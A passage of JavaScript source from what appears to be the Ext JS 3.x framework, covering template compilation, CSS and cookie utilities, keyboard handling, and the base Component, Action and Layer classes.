return v + " " + (v == 1 ? s : (p ? p : s + "s"))
}, nl2br:function (v) {
return Ext.isEmpty(v) ? "" : v.replace(nl2brRe, "<br/>")
}}
}();
Ext.XTemplate = function () {
Ext.XTemplate.superclass.constructor.apply(this, arguments);
var y = this, j = y.html, q = /<tpl\b[^>]*>((?:(?=([^<]+))\2|<(?!tpl\b[^>]*>))*?)<\/tpl>/, d = /^<tpl\b[^>]*?for="(.*?)"/, v = /^<tpl\b[^>]*?if="(.*?)"/, x = /^<tpl\b[^>]*?exec="(.*?)"/, r, p = 0, k = [], o = "values", w = "parent", l = "xindex", n = "xcount", e = "return ", c = "with(values){ ";
j = ["<tpl>", j, "</tpl>"].join("");
while ((r = j.match(q))) {
var b = r[0].match(d), a = r[0].match(v), A = r[0].match(x), g = null, h = null, t = null, z = b && b[1] ? b[1] : "";
if (a) {
g = a && a[1] ? a[1] : null;
if (g) {
h = new Function(o, w, l, n, c + e + (Ext.util.Format.htmlDecode(g)) + "; }")
}
}
if (A) {
g = A && A[1] ? A[1] : null;
if (g) {
t = new Function(o, w, l, n, c + (Ext.util.Format.htmlDecode(g)) + "; }")
}
}
if (z) {
switch (z) {
case".":
z = new Function(o, w, c + e + o + "; }");
break;
case"..":
z = new Function(o, w, c + e + w + "; }");
break;
default:
z = new Function(o, w, c + e + z + "; }")
}
}
k.push({id:p, target:z, exec:t, test:h, body:r[1] || ""});
j = j.replace(r[0], "{xtpl" + p + "}");
++p
}
for (var u = k.length - 1; u >= 0; --u) {
y.compileTpl(k[u])
}
y.master = k[k.length - 1];
y.tpls = k
};
Ext.extend(Ext.XTemplate, Ext.Template, {re:/\{([\w\-\.\#]+)(?:\:([\w\.]*)(?:\((.*?)?\))?)?(\s?[\+\-\*\\]\s?[\d\.\+\-\*\\\(\)]+)?\}/g, codeRe:/\{\[((?:\\\]|.|\n)*?)\]\}/g, applySubTemplate:function (a, k, j, d, c) {
var h = this, g, m = h.tpls[a], l, b = [];
if ((m.test && !m.test.call(h, k, j, d, c)) || (m.exec && m.exec.call(h, k, j, d, c))) {
return""
}
l = m.target ? m.target.call(h, k, j) : k;
g = l.length;
j = m.target ? k : j;
if (m.target && Ext.isArray(l)) {
for (var e = 0, g = l.length; e < g; e++) {
b[b.length] = m.compiled.call(h, l[e], j, e + 1, g)
}
return b.join("")
}
return m.compiled.call(h, l, j, d, c)
}, compileTpl:function (tpl) {
var fm = Ext.util.Format, useF = this.disableFormats !== true, sep = Ext.isGecko ? "+" : ",", body;
function fn(m, name, format, args, math) {
if (name.substr(0, 4) == "xtpl") {
return"'" + sep + "this.applySubTemplate(" + name.substr(4) + ", values, parent, xindex, xcount)" + sep + "'"
}
var v;
if (name === ".") {
v = "values"
} else {
if (name === "#") {
v = "xindex"
} else {
if (name.indexOf(".") != -1) {
v = name
} else {
v = "values['" + name + "']"
}
}
}
if (math) {
v = "(" + v + math + ")"
}
if (format && useF) {
args = args ? "," + args : "";
if (format.substr(0, 5) != "this.") {
format = "fm." + format + "("
} else {
format = 'this.call("' + format.substr(5) + '", ';
args = ", values"
}
} else {
args = "";
format = "(" + v + " === undefined ? '' : "
}
return"'" + sep + format + v + args + ")" + sep + "'"
}
function codeFn(m, code) {
return"'" + sep + "(" + code.replace(/\\'/g, "'") + ")" + sep + "'"
}
if (Ext.isGecko) {
body = "tpl.compiled = function(values, parent, xindex, xcount){ return '" + tpl.body.replace(/(\r\n|\n)/g, "\\n").replace(/'/g, "\\'").replace(this.re, fn).replace(this.codeRe, codeFn) + "';};"
} else {
body = ["tpl.compiled = function(values, parent, xindex, xcount){ return ['"];
body.push(tpl.body.replace(/(\r\n|\n)/g, "\\n").replace(/'/g, "\\'").replace(this.re, fn).replace(this.codeRe, codeFn));
body.push("'].join('');};");
body = body.join("")
}
eval(body);
return this
}, applyTemplate:function (a) {
return this.master.compiled.call(this, a, {}, 1, 1)
}, compile:function () {
return this
}});
Ext.XTemplate.prototype.apply = Ext.XTemplate.prototype.applyTemplate;
Ext.XTemplate.from = function (a) {
a = Ext.getDom(a);
return new Ext.XTemplate(a.value || a.innerHTML)
};
Ext.util.CSS = function () {
var d = null;
var c = document;
var b = /(-[a-z])/gi;
var a = function (e, g) {
return g.charAt(1).toUpperCase()
};
return{createStyleSheet:function (i, l) {
var h;
var g = c.getElementsByTagName("head")[0];
var k = c.createElement("style");
k.setAttribute("type", "text/css");
if (l) {
k.setAttribute("id", l)
}
if (Ext.isIE) {
g.appendChild(k);
h = k.styleSheet;
h.cssText = i
} else {
try {
k.appendChild(c.createTextNode(i))
} catch (j) {
k.cssText = i
}
g.appendChild(k);
h = k.styleSheet ? k.styleSheet : (k.sheet || c.styleSheets[c.styleSheets.length - 1])
}
this.cacheStyleSheet(h);
return h
}, removeStyleSheet:function (g) {
var e = c.getElementById(g);
if (e) {
e.parentNode.removeChild(e)
}
}, swapStyleSheet:function (h, e) {
this.removeStyleSheet(h);
var g = c.createElement("link");
g.setAttribute("rel", "stylesheet");
g.setAttribute("type", "text/css");
g.setAttribute("id", h);
g.setAttribute("href", e);
c.getElementsByTagName("head")[0].appendChild(g)
}, refreshCache:function () {
return this.getRules(true)
}, cacheStyleSheet:function (h) {
if (!d) {
d = {}
}
try {
var k = h.cssRules || h.rules;
for (var g = k.length - 1; g >= 0; --g) {
d[k[g].selectorText.toLowerCase()] = k[g]
}
} catch (i) {
}
}, getRules:function (h) {
if (d === null || h) {
d = {};
var k = c.styleSheets;
for (var j = 0, g = k.length; j < g; j++) {
try {
this.cacheStyleSheet(k[j])
} catch (l) {
}
}
}
return d
}, getRule:function (e, h) {
var g = this.getRules(h);
if (!Ext.isArray(e)) {
return g[e.toLowerCase()]
}
for (var j = 0; j < e.length; j++) {
if (g[e[j]]) {
return g[e[j].toLowerCase()]
}
}
return null
}, updateRule:function (e, j, h) {
if (!Ext.isArray(e)) {
var k = this.getRule(e);
if (k) {
k.style[j.replace(b, a)] = h;
return true
}
} else {
for (var g = 0; g < e.length; g++) {
if (this.updateRule(e[g], j, h)) {
return true
}
}
}
return false
}}
}();
Ext.util.ClickRepeater = Ext.extend(Ext.util.Observable, {constructor:function (b, a) {
this.el = Ext.get(b);
this.el.unselectable();
Ext.apply(this, a);
this.addEvents("mousedown", "click", "mouseup");
if (!this.disabled) {
this.disabled = true;
this.enable()
}
if (this.handler) {
this.on("click", this.handler, this.scope || this)
}
Ext.util.ClickRepeater.superclass.constructor.call(this)
}, interval:20, delay:250, preventDefault:true, stopDefault:false, timer:0, enable:function () {
if (this.disabled) {
this.el.on("mousedown", this.handleMouseDown, this);
if (Ext.isIE) {
this.el.on("dblclick", this.handleDblClick, this)
}
if (this.preventDefault || this.stopDefault) {
this.el.on("click", this.eventOptions, this)
}
}
this.disabled = false
}, disable:function (a) {
if (a || !this.disabled) {
clearTimeout(this.timer);
if (this.pressClass) {
this.el.removeClass(this.pressClass)
}
Ext.getDoc().un("mouseup", this.handleMouseUp, this);
this.el.removeAllListeners()
}
this.disabled = true
}, setDisabled:function (a) {
this[a ? "disable" : "enable"]()
}, eventOptions:function (a) {
if (this.preventDefault) {
a.preventDefault()
}
if (this.stopDefault) {
a.stopEvent()
}
}, destroy:function () {
this.disable(true);
Ext.destroy(this.el);
this.purgeListeners()
}, handleDblClick:function (a) {
clearTimeout(this.timer);
this.el.blur();
this.fireEvent("mousedown", this, a);
this.fireEvent("click", this, a)
}, handleMouseDown:function (a) {
clearTimeout(this.timer);
this.el.blur();
if (this.pressClass) {
this.el.addClass(this.pressClass)
}
this.mousedownTime = new Date();
Ext.getDoc().on("mouseup", this.handleMouseUp, this);
this.el.on("mouseout", this.handleMouseOut, this);
this.fireEvent("mousedown", this, a);
this.fireEvent("click", this, a);
if (this.accelerate) {
this.delay = 400
}
this.timer = this.click.defer(this.delay || this.interval, this, [a])
}, click:function (a) {
this.fireEvent("click", this, a);
this.timer = this.click.defer(this.accelerate ? this.easeOutExpo(this.mousedownTime.getElapsed(), 400, -390, 12000) : this.interval, this, [a])
}, easeOutExpo:function (e, a, h, g) {
return(e == g) ? a + h : h * (-Math.pow(2, -10 * e / g) + 1) + a
}, handleMouseOut:function () {
clearTimeout(this.timer);
if (this.pressClass) {
this.el.removeClass(this.pressClass)
}
this.el.on("mouseover", this.handleMouseReturn, this)
}, handleMouseReturn:function () {
this.el.un("mouseover", this.handleMouseReturn, this);
if (this.pressClass) {
this.el.addClass(this.pressClass)
}
this.click()
}, handleMouseUp:function (a) {
clearTimeout(this.timer);
this.el.un("mouseover", this.handleMouseReturn, this);
this.el.un("mouseout", this.handleMouseOut, this);
Ext.getDoc().un("mouseup", this.handleMouseUp, this);
this.el.removeClass(this.pressClass);
this.fireEvent("mouseup", this, a)
}});
Ext.KeyNav = function (b, a) {
this.el = Ext.get(b);
Ext.apply(this, a);
if (!this.disabled) {
this.disabled = true;
this.enable()
}
};
Ext.KeyNav.prototype = {disabled:false, defaultEventAction:"stopEvent", forceKeyDown:false, relay:function (c) {
var a = c.getKey(), b = this.keyToHandler[a];
if (b && this[b]) {
if (this.doRelay(c, this[b], b) !== true) {
c[this.defaultEventAction]()
}
}
}, doRelay:function (c, b, a) {
return b.call(this.scope || this, c, a)
}, enter:false, left:false, right:false, up:false, down:false, tab:false, esc:false, pageUp:false, pageDown:false, del:false, home:false, end:false, space:false, keyToHandler:{37:"left", 39:"right", 38:"up", 40:"down", 33:"pageUp", 34:"pageDown", 46:"del", 36:"home", 35:"end", 13:"enter", 27:"esc", 9:"tab", 32:"space"}, stopKeyUp:function (b) {
var a = b.getKey();
if (a >= 37 && a <= 40) {
b.stopEvent()
}
}, destroy:function () {
this.disable()
}, enable:function () {
if (this.disabled) {
if (Ext.isSafari2) {
this.el.on("keyup", this.stopKeyUp, this)
}
this.el.on(this.isKeydown() ? "keydown" : "keypress", this.relay, this);
this.disabled = false
}
}, disable:function () {
if (!this.disabled) {
if (Ext.isSafari2) {
this.el.un("keyup", this.stopKeyUp, this)
}
this.el.un(this.isKeydown() ? "keydown" : "keypress", this.relay, this);
this.disabled = true
}
}, setDisabled:function (a) {
this[a ? "disable" : "enable"]()
}, isKeydown:function () {
return this.forceKeyDown || Ext.EventManager.useKeydown
}};
Ext.KeyMap = function (c, b, a) {
this.el = Ext.get(c);
this.eventName = a || "keydown";
this.bindings = [];
if (b) {
this.addBinding(b)
}
this.enable()
};
Ext.KeyMap.prototype = {stopEvent:false, addBinding:function (b) {
if (Ext.isArray(b)) {
Ext.each(b, function (j) {
this.addBinding(j)
}, this);
return
}
var k = b.key, g = b.fn || b.handler, l = b.scope;
if (b.stopEvent) {
this.stopEvent = b.stopEvent
}
if (typeof k == "string") {
var h = [];
var e = k.toUpperCase();
for (var c = 0, d = e.length; c < d; c++) {
h.push(e.charCodeAt(c))
}
k = h
}
var a = Ext.isArray(k);
var i = function (o) {
if (this.checkModifiers(b, o)) {
var m = o.getKey();
if (a) {
for (var n = 0, j = k.length; n < j; n++) {
if (k[n] == m) {
if (this.stopEvent) {
o.stopEvent()
}
g.call(l || window, m, o);
return
}
}
} else {
if (m == k) {
if (this.stopEvent) {
o.stopEvent()
}
g.call(l || window, m, o)
}
}
}
};
this.bindings.push(i)
}, checkModifiers:function (b, h) {
var j, d, g = ["shift", "ctrl", "alt"];
for (var c = 0, a = g.length; c < a; ++c) {
d = g[c];
j = b[d];
if (!(j === undefined || (j === h[d + "Key"]))) {
return false
}
}
return true
}, on:function (b, d, c) {
var h, a, e, g;
if (typeof b == "object" && !Ext.isArray(b)) {
h = b.key;
a = b.shift;
e = b.ctrl;
g = b.alt
} else {
h = b
}
this.addBinding({key:h, shift:a, ctrl:e, alt:g, fn:d, scope:c})
}, handleKeyDown:function (g) {
if (this.enabled) {
var c = this.bindings;
for (var d = 0, a = c.length; d < a; d++) {
c[d].call(this, g)
}
}
}, isEnabled:function () {
return this.enabled
}, enable:function () {
if (!this.enabled) {
this.el.on(this.eventName, this.handleKeyDown, this);
this.enabled = true
}
}, disable:function () {
if (this.enabled) {
this.el.removeListener(this.eventName, this.handleKeyDown, this);
this.enabled = false
}
}, setDisabled:function (a) {
this[a ? "disable" : "enable"]()
}};
Ext.util.TextMetrics = function () {
var a;
return{measure:function (b, c, d) {
if (!a) {
a = Ext.util.TextMetrics.Instance(b, d)
}
a.bind(b);
a.setFixedWidth(d || "auto");
return a.getSize(c)
}, createInstance:function (b, c) {
return Ext.util.TextMetrics.Instance(b, c)
}}
}();
Ext.util.TextMetrics.Instance = function (b, d) {
var c = new Ext.Element(document.createElement("div"));
document.body.appendChild(c.dom);
c.position("absolute");
c.setLeftTop(-1000, -1000);
c.hide();
if (d) {
c.setWidth(d)
}
var a = {getSize:function (g) {
c.update(g);
var e = c.getSize();
c.update("");
return e
}, bind:function (e) {
c.setStyle(Ext.fly(e).getStyles("font-size", "font-style", "font-weight", "font-family", "line-height", "text-transform", "letter-spacing"))
}, setFixedWidth:function (e) {
c.setWidth(e)
}, getWidth:function (e) {
c.dom.style.width = "auto";
return this.getSize(e).width
}, getHeight:function (e) {
return this.getSize(e).height
}};
a.bind(b);
return a
};
Ext.Element.addMethods({getTextWidth:function (c, b, a) {
return(Ext.util.TextMetrics.measure(this.dom, Ext.value(c, this.dom.innerHTML, true)).width).constrain(b || 0, a || 1000000)
}});
Ext.util.Cookies = {set:function (c, e) {
var a = arguments;
var i = arguments.length;
var b = (i > 2) ? a[2] : null;
var h = (i > 3) ? a[3] : "/";
var d = (i > 4) ? a[4] : null;
var g = (i > 5) ? a[5] : false;
document.cookie = c + "=" + escape(e) + ((b === null) ? "" : ("; expires=" + b.toGMTString())) + ((h === null) ? "" : ("; path=" + h)) + ((d === null) ? "" : ("; domain=" + d)) + ((g === true) ? "; secure" : "")
}, get:function (d) {
var b = d + "=";
var g = b.length;
var a = document.cookie.length;
var e = 0;
var c = 0;
while (e < a) {
c = e + g;
if (document.cookie.substring(e, c) == b) {
return Ext.util.Cookies.getCookieVal(c)
}
e = document.cookie.indexOf(" ", e) + 1;
if (e === 0) {
break
}
}
return null
}, clear:function (a) {
if (Ext.util.Cookies.get(a)) {
document.cookie = a + "=; expires=Thu, 01-Jan-70 00:00:01 GMT"
}
}, getCookieVal:function (b) {
var a = document.cookie.indexOf(";", b);
if (a == -1) {
a = document.cookie.length
}
return unescape(document.cookie.substring(b, a))
}};
Ext.handleError = function (a) {
throw a
};
Ext.Error = function (a) {
this.message = (this.lang[a]) ? this.lang[a] : a
};
Ext.Error.prototype = new Error();
Ext.apply(Ext.Error.prototype, {lang:{}, name:"Ext.Error", getName:function () {
return this.name
}, getMessage:function () {
return this.message
}, toJson:function () {
return Ext.encode(this)
}});
Ext.ComponentMgr = function () {
var c = new Ext.util.MixedCollection();
var b = {};
var a = {};
return{register:function (d) {
c.add(d)
}, unregister:function (d) {
c.remove(d)
}, get:function (d) {
return c.get(d)
}, onAvailable:function (g, e, d) {
c.on("add", function (h, i) {
if (i.id == g) {
e.call(d || i, i);
c.un("add", e, d)
}
})
}, all:c, types:b, ptypes:a, isRegistered:function (d) {
return b[d] !== undefined
}, isPluginRegistered:function (d) {
return a[d] !== undefined
}, registerType:function (e, d) {
b[e] = d;
d.xtype = e
}, create:function (d, e) {
return d.render ? d : new b[d.xtype || e](d)
}, registerPlugin:function (e, d) {
a[e] = d;
d.ptype = e
}, createPlugin:function (e, g) {
var d = a[e.ptype || g];
if (d.init) {
return d
} else {
return new d(e)
}
}}
}();
Ext.reg = Ext.ComponentMgr.registerType;
Ext.preg = Ext.ComponentMgr.registerPlugin;
Ext.create = Ext.ComponentMgr.create;
Ext.Component = function (b) {
b = b || {};
if (b.initialConfig) {
if (b.isAction) {
this.baseAction = b
}
b = b.initialConfig
} else {
if (b.tagName || b.dom || Ext.isString(b)) {
b = {applyTo:b, id:b.id || b}
}
}
this.initialConfig = b;
Ext.apply(this, b);
this.addEvents("added", "disable", "enable", "beforeshow", "show", "beforehide", "hide", "removed", "beforerender", "render", "afterrender", "beforedestroy", "destroy", "beforestaterestore", "staterestore", "beforestatesave", "statesave");
this.getId();
Ext.ComponentMgr.register(this);
Ext.Component.superclass.constructor.call(this);
if (this.baseAction) {
this.baseAction.addComponent(this)
}
this.initComponent();
if (this.plugins) {
if (Ext.isArray(this.plugins)) {
for (var c = 0, a = this.plugins.length; c < a; c++) {
this.plugins[c] = this.initPlugin(this.plugins[c])
}
} else {
this.plugins = this.initPlugin(this.plugins)
}
}
if (this.stateful !== false) {
this.initState()
}
if (this.applyTo) {
this.applyToMarkup(this.applyTo);
delete this.applyTo
} else {
if (this.renderTo) {
this.render(this.renderTo);
delete this.renderTo
}
}
};
Ext.Component.AUTO_ID = 1000;
Ext.extend(Ext.Component, Ext.util.Observable, {disabled:false, hidden:false, autoEl:"div", disabledClass:"x-item-disabled", allowDomMove:true, autoShow:false, hideMode:"display", hideParent:false, rendered:false, tplWriteMode:"overwrite", bubbleEvents:[], ctype:"Ext.Component", actionMode:"el", getActionEl:function () {
return this[this.actionMode]
}, initPlugin:function (a) {
if (a.ptype && !Ext.isFunction(a.init)) {
a = Ext.ComponentMgr.createPlugin(a)
} else {
if (Ext.isString(a)) {
a = Ext.ComponentMgr.createPlugin({ptype:a})
}
}
a.init(this);
return a
}, initComponent:function () {
if (this.listeners) {
this.on(this.listeners);
delete this.listeners
}
this.enableBubble(this.bubbleEvents)
}, render:function (b, a) {
if (!this.rendered && this.fireEvent("beforerender", this) !== false) {
if (!b && this.el) {
this.el = Ext.get(this.el);
b = this.el.dom.parentNode;
this.allowDomMove = false
}
this.container = Ext.get(b);
if (this.ctCls) {
this.container.addClass(this.ctCls)
}
this.rendered = true;
if (a !== undefined) {
if (Ext.isNumber(a)) {
a = this.container.dom.childNodes[a]
} else {
a = Ext.getDom(a)
}
}
this.onRender(this.container, a || null);
if (this.autoShow) {
this.el.removeClass(["x-hidden", "x-hide-" + this.hideMode])
}
if (this.cls) {
this.el.addClass(this.cls);
delete this.cls
}
if (this.style) {
this.el.applyStyles(this.style);
delete this.style
}
if (this.overCls) {
this.el.addClassOnOver(this.overCls)
}
this.fireEvent("render", this);
var c = this.getContentTarget();
if (this.html) {
c.update(Ext.DomHelper.markup(this.html));
delete this.html
}
if (this.contentEl) {
var d = Ext.getDom(this.contentEl);
Ext.fly(d).removeClass(["x-hidden", "x-hide-display"]);
c.appendChild(d)
}
if (this.tpl) {
if (!this.tpl.compile) {
this.tpl = new Ext.XTemplate(this.tpl)
}
if (this.data) {
this.tpl[this.tplWriteMode](c, this.data);
delete this.data
}
}
this.afterRender(this.container);
if (this.hidden) {
this.doHide()
}
if (this.disabled) {
this.disable(true)
}
if (this.stateful !== false) {
this.initStateEvents()
}
this.fireEvent("afterrender", this)
}
return this
}, update:function (b, d, a) {
var c = this.getContentTarget();
if (this.tpl && typeof b !== "string") {
this.tpl[this.tplWriteMode](c, b || {})
} else {
var e = Ext.isObject(b) ? Ext.DomHelper.markup(b) : b;
c.update(e, d, a)
}
}, onAdded:function (a, b) {
this.ownerCt = a;
this.initRef();
this.fireEvent("added", this, a, b)
}, onRemoved:function () {
this.removeRef();
this.fireEvent("removed", this, this.ownerCt);
delete this.ownerCt
}, initRef:function () {
if (this.ref && !this.refOwner) {
var d = this.ref.split("/"), c = d.length, b = 0, a = this;
while (a && b < c) {
a = a.ownerCt;
++b
}
if (a) {
a[this.refName = d[--b]] = this;
this.refOwner = a
}
}
}, removeRef:function () {
if (this.refOwner && this.refName) {
delete this.refOwner[this.refName];
delete this.refOwner
}
}, initState:function () {
if (Ext.state.Manager) {
var b = this.getStateId();
if (b) {
var a = Ext.state.Manager.get(b);
if (a) {
if (this.fireEvent("beforestaterestore", this, a) !== false) {
this.applyState(Ext.apply({}, a));
this.fireEvent("staterestore", this, a)
}
}
}
}
}, getStateId:function () {
return this.stateId || ((/^(ext-comp-|ext-gen)/).test(String(this.id)) ? null : this.id)
}, initStateEvents:function () {
if (this.stateEvents) {
for (var a = 0, b; b = this.stateEvents[a]; a++) {
this.on(b, this.saveState, this, {delay:100})
}
}
}, applyState:function (a) {
if (a) {
Ext.apply(this, a)
}
}, getState:function () {
return null
}, saveState:function () {
if (Ext.state.Manager && this.stateful !== false) {
var b = this.getStateId();
if (b) {
var a = this.getState();
if (this.fireEvent("beforestatesave", this, a) !== false) {
Ext.state.Manager.set(b, a);
this.fireEvent("statesave", this, a)
}
}
}
}, applyToMarkup:function (a) {
this.allowDomMove = false;
this.el = Ext.get(a);
this.render(this.el.dom.parentNode)
}, addClass:function (a) {
if (this.el) {
this.el.addClass(a)
} else {
this.cls = this.cls ? this.cls + " " + a : a
}
return this
}, removeClass:function (a) {
if (this.el) {
this.el.removeClass(a)
} else {
if (this.cls) {
this.cls = this.cls.split(" ").remove(a).join(" ")
}
}
return this
}, onRender:function (b, a) {
if (!this.el && this.autoEl) {
if (Ext.isString(this.autoEl)) {
this.el = document.createElement(this.autoEl)
} else {
var c = document.createElement("div");
Ext.DomHelper.overwrite(c, this.autoEl);
this.el = c.firstChild
}
if (!this.el.id) {
this.el.id = this.getId()
}
}
if (this.el) {
this.el = Ext.get(this.el);
if (this.allowDomMove !== false) {
b.dom.insertBefore(this.el.dom, a);
if (c) {
Ext.removeNode(c);
c = null
}
}
}
}, getAutoCreate:function () {
var a = Ext.isObject(this.autoCreate) ? this.autoCreate : Ext.apply({}, this.defaultAutoCreate);
if (this.id && !a.id) {
a.id = this.id
}
return a
}, afterRender:Ext.emptyFn, destroy:function () {
if (!this.isDestroyed) {
if (this.fireEvent("beforedestroy", this) !== false) {
this.destroying = true;
this.beforeDestroy();
if (this.ownerCt && this.ownerCt.remove) {
this.ownerCt.remove(this, false)
}
if (this.rendered) {
this.el.remove();
if (this.actionMode == "container" || this.removeMode == "container") {
this.container.remove()
}
}
if (this.focusTask && this.focusTask.cancel) {
this.focusTask.cancel()
}
this.onDestroy();
Ext.ComponentMgr.unregister(this);
this.fireEvent("destroy", this);
this.purgeListeners();
this.destroying = false;
this.isDestroyed = true
}
}
}, deleteMembers:function () {
var b = arguments;
for (var c = 0, a = b.length; c < a; ++c) {
delete this[b[c]]
}
}, beforeDestroy:Ext.emptyFn, onDestroy:Ext.emptyFn, getEl:function () {
return this.el
}, getContentTarget:function () {
return this.el
}, getId:function () {
return this.id || (this.id = "ext-comp-" + (++Ext.Component.AUTO_ID))
}, getItemId:function () {
return this.itemId || this.getId()
}, focus:function (b, a) {
if (a) {
this.focusTask = new Ext.util.DelayedTask(this.focus, this, [b, false]);
this.focusTask.delay(Ext.isNumber(a) ? a : 10);
return this
}
if (this.rendered && !this.isDestroyed) {
this.el.focus();
if (b === true) {
this.el.dom.select()
}
}
return this
}, blur:function () {
if (this.rendered) {
this.el.blur()
}
return this
}, disable:function (a) {
if (this.rendered) {
this.onDisable()
}
this.disabled = true;
if (a !== true) {
this.fireEvent("disable", this)
}
return this
}, onDisable:function () {
this.getActionEl().addClass(this.disabledClass);
this.el.dom.disabled = true
}, enable:function () {
if (this.rendered) {
this.onEnable()
}
this.disabled = false;
this.fireEvent("enable", this);
return this
}, onEnable:function () {
this.getActionEl().removeClass(this.disabledClass);
this.el.dom.disabled = false
}, setDisabled:function (a) {
return this[a ? "disable" : "enable"]()
}, show:function () {
if (this.fireEvent("beforeshow", this) !== false) {
this.hidden = false;
if (this.autoRender) {
this.render(Ext.isBoolean(this.autoRender) ? Ext.getBody() : this.autoRender)
}
if (this.rendered) {
this.onShow()
}
this.fireEvent("show", this)
}
return this
}, onShow:function () {
this.getVisibilityEl().removeClass("x-hide-" + this.hideMode)
}, hide:function () {
if (this.fireEvent("beforehide", this) !== false) {
this.doHide();
this.fireEvent("hide", this)
}
return this
}, doHide:function () {
this.hidden = true;
if (this.rendered) {
this.onHide()
}
}, onHide:function () {
this.getVisibilityEl().addClass("x-hide-" + this.hideMode)
}, getVisibilityEl:function () {
return this.hideParent ? this.container : this.getActionEl()
}, setVisible:function (a) {
return this[a ? "show" : "hide"]()
}, isVisible:function () {
return this.rendered && this.getVisibilityEl().isVisible()
}, cloneConfig:function (b) {
b = b || {};
var c = b.id || Ext.id();
var a = Ext.applyIf(b, this.initialConfig);
a.id = c;
return new this.constructor(a)
}, getXType:function () {
return this.constructor.xtype
}, isXType:function (b, a) {
if (Ext.isFunction(b)) {
b = b.xtype
} else {
if (Ext.isObject(b)) {
b = b.constructor.xtype
}
}
return !a ? ("/" + this.getXTypes() + "/").indexOf("/" + b + "/") != -1 : this.constructor.xtype == b
}, getXTypes:function () {
var a = this.constructor;
if (!a.xtypes) {
var d = [], b = this;
while (b && b.constructor.xtype) {
d.unshift(b.constructor.xtype);
b = b.constructor.superclass
}
a.xtypeChain = d;
a.xtypes = d.join("/")
}
return a.xtypes
}, findParentBy:function (a) {
for (var b = this.ownerCt; (b != null) && !a(b, this); b = b.ownerCt) {
}
return b || null
}, findParentByType:function (b, a) {
return this.findParentBy(function (d) {
return d.isXType(b, a)
})
}, bubble:function (c, b, a) {
var d = this;
while (d) {
if (c.apply(b || d, a || [d]) === false) {
break
}
d = d.ownerCt
}
return this
}, getPositionEl:function () {
return this.positionEl || this.el
}, purgeListeners:function () {
Ext.Component.superclass.purgeListeners.call(this);
if (this.mons) {
this.on("beforedestroy", this.clearMons, this, {single:true})
}
}, clearMons:function () {
Ext.each(this.mons, function (a) {
a.item.un(a.ename, a.fn, a.scope)
}, this);
this.mons = []
}, createMons:function () {
if (!this.mons) {
this.mons = [];
this.on("beforedestroy", this.clearMons, this, {single:true})
}
}, mon:function (g, b, d, c, a) {
this.createMons();
if (Ext.isObject(b)) {
var j = /^(?:scope|delay|buffer|single|stopEvent|preventDefault|stopPropagation|normalized|args|delegate)$/;
var i = b;
for (var h in i) {
if (j.test(h)) {
continue
}
if (Ext.isFunction(i[h])) {
this.mons.push({item:g, ename:h, fn:i[h], scope:i.scope});
g.on(h, i[h], i.scope, i)
} else {
this.mons.push({item:g, ename:h, fn:i[h], scope:i.scope});
g.on(h, i[h])
}
}
return
}
this.mons.push({item:g, ename:b, fn:d, scope:c});
g.on(b, d, c, a)
}, mun:function (h, c, g, e) {
var j, d;
this.createMons();
for (var b = 0, a = this.mons.length; b < a; ++b) {
d = this.mons[b];
if (h === d.item && c == d.ename && g === d.fn && e === d.scope) {
this.mons.splice(b, 1);
h.un(c, g, e);
j = true;
break
}
}
return j
}, nextSibling:function () {
if (this.ownerCt) {
var a = this.ownerCt.items.indexOf(this);
if (a != -1 && a + 1 < this.ownerCt.items.getCount()) {
return this.ownerCt.items.itemAt(a + 1)
}
}
return null
}, previousSibling:function () {
if (this.ownerCt) {
var a = this.ownerCt.items.indexOf(this);
if (a > 0) {
return this.ownerCt.items.itemAt(a - 1)
}
}
return null
}, getBubbleTarget:function () {
return this.ownerCt
}});
Ext.reg("component", Ext.Component);
Ext.Action = Ext.extend(Object, {constructor:function (a) {
this.initialConfig = a;
this.itemId = a.itemId = (a.itemId || a.id || Ext.id());
this.items = []
}, isAction:true, setText:function (a) {
this.initialConfig.text = a;
this.callEach("setText", [a])
}, getText:function () {
return this.initialConfig.text
}, setIconClass:function (a) {
this.initialConfig.iconCls = a;
this.callEach("setIconClass", [a])
}, getIconClass:function () {
return this.initialConfig.iconCls
}, setDisabled:function (a) {
this.initialConfig.disabled = a;
this.callEach("setDisabled", [a])
}, enable:function () {
this.setDisabled(false)
}, disable:function () {
this.setDisabled(true)
}, isDisabled:function () {
return this.initialConfig.disabled
}, setHidden:function (a) {
this.initialConfig.hidden = a;
this.callEach("setVisible", [!a])
}, show:function () {
this.setHidden(false)
}, hide:function () {
this.setHidden(true)
}, isHidden:function () {
return this.initialConfig.hidden
}, setHandler:function (b, a) {
this.initialConfig.handler = b;
this.initialConfig.scope = a;
this.callEach("setHandler", [b, a])
}, each:function (b, a) {
Ext.each(this.items, b, a)
}, callEach:function (e, b) {
var d = this.items;
for (var c = 0, a = d.length; c < a; c++) {
d[c][e].apply(d[c], b)
}
}, addComponent:function (a) {
this.items.push(a);
a.on("destroy", this.removeComponent, this)
}, removeComponent:function (a) {
this.items.remove(a)
}, execute:function () {
this.initialConfig.handler.apply(this.initialConfig.scope || window, arguments)
}});
(function () {
Ext.Layer = function (d, c) {
d = d || {};
var e = Ext.DomHelper, h = d.parentEl, g = h ? Ext.getDom(h) : document.body;
if (c) {
this.dom = Ext.getDom(c)
}
if (!this.dom) {
var i = d.dh || {tag:"div", cls:"x-layer"};
this.dom = e.append(g, i)
}
if (d.cls) {
this.addClass(d.cls)
}
this.constrain = d.constrain !== false;
this.setVisibilityMode(Ext.Element.VISIBILITY);
if (d.id) {
this.id = this.dom.id = d.id
} else {
this.id = Ext.id(this.dom)
}
this.zindex = d.zindex || this.getZIndex();
this.position("absolute", this.zindex);
if (d.shadow) {
this.shadowOffset = d.shadowOffset || 4;
this.shadow = new Ext.Shadow({offset:this.shadowOffset, mode:d.shadow})
} else {
this.shadowOffset = 0
}
this.useShim = d.shim !== false && Ext.useShims;
this.useDisplay = d.useDisplay;
this.hide()
};
var a = Ext.Element.prototype;
var b = [];
Ext.extend(Ext.Layer, Ext.Element, {getZIndex:function () {
return this.zindex || parseInt((this.getShim() || this).getStyle("z-index"), 10) || 11000
}, getShim:function () {
if (!this.useShim) {
return null
}
if (this.shim) {
return this.shim
}
var d = b.shift();
if (!d) {
d = this.createShim();
d.enableDisplayMode("block");
d.dom.style.display = "none";
d.dom.style.visibility = "visible"
}
var c = this.dom.parentNode;
if (d.dom.parentNode != c) {
c.insertBefore(d.dom, this.dom)
}
d.setStyle("z-index", this.getZIndex() - 2);
this.shim = d;
return d
}, hideShim:function () {
if (this.shim) {
this.shim.setDisplayed(false);
b.push(this.shim);
delete this.shim
}
}, disableShadow:function () {
if (this.shadow) {
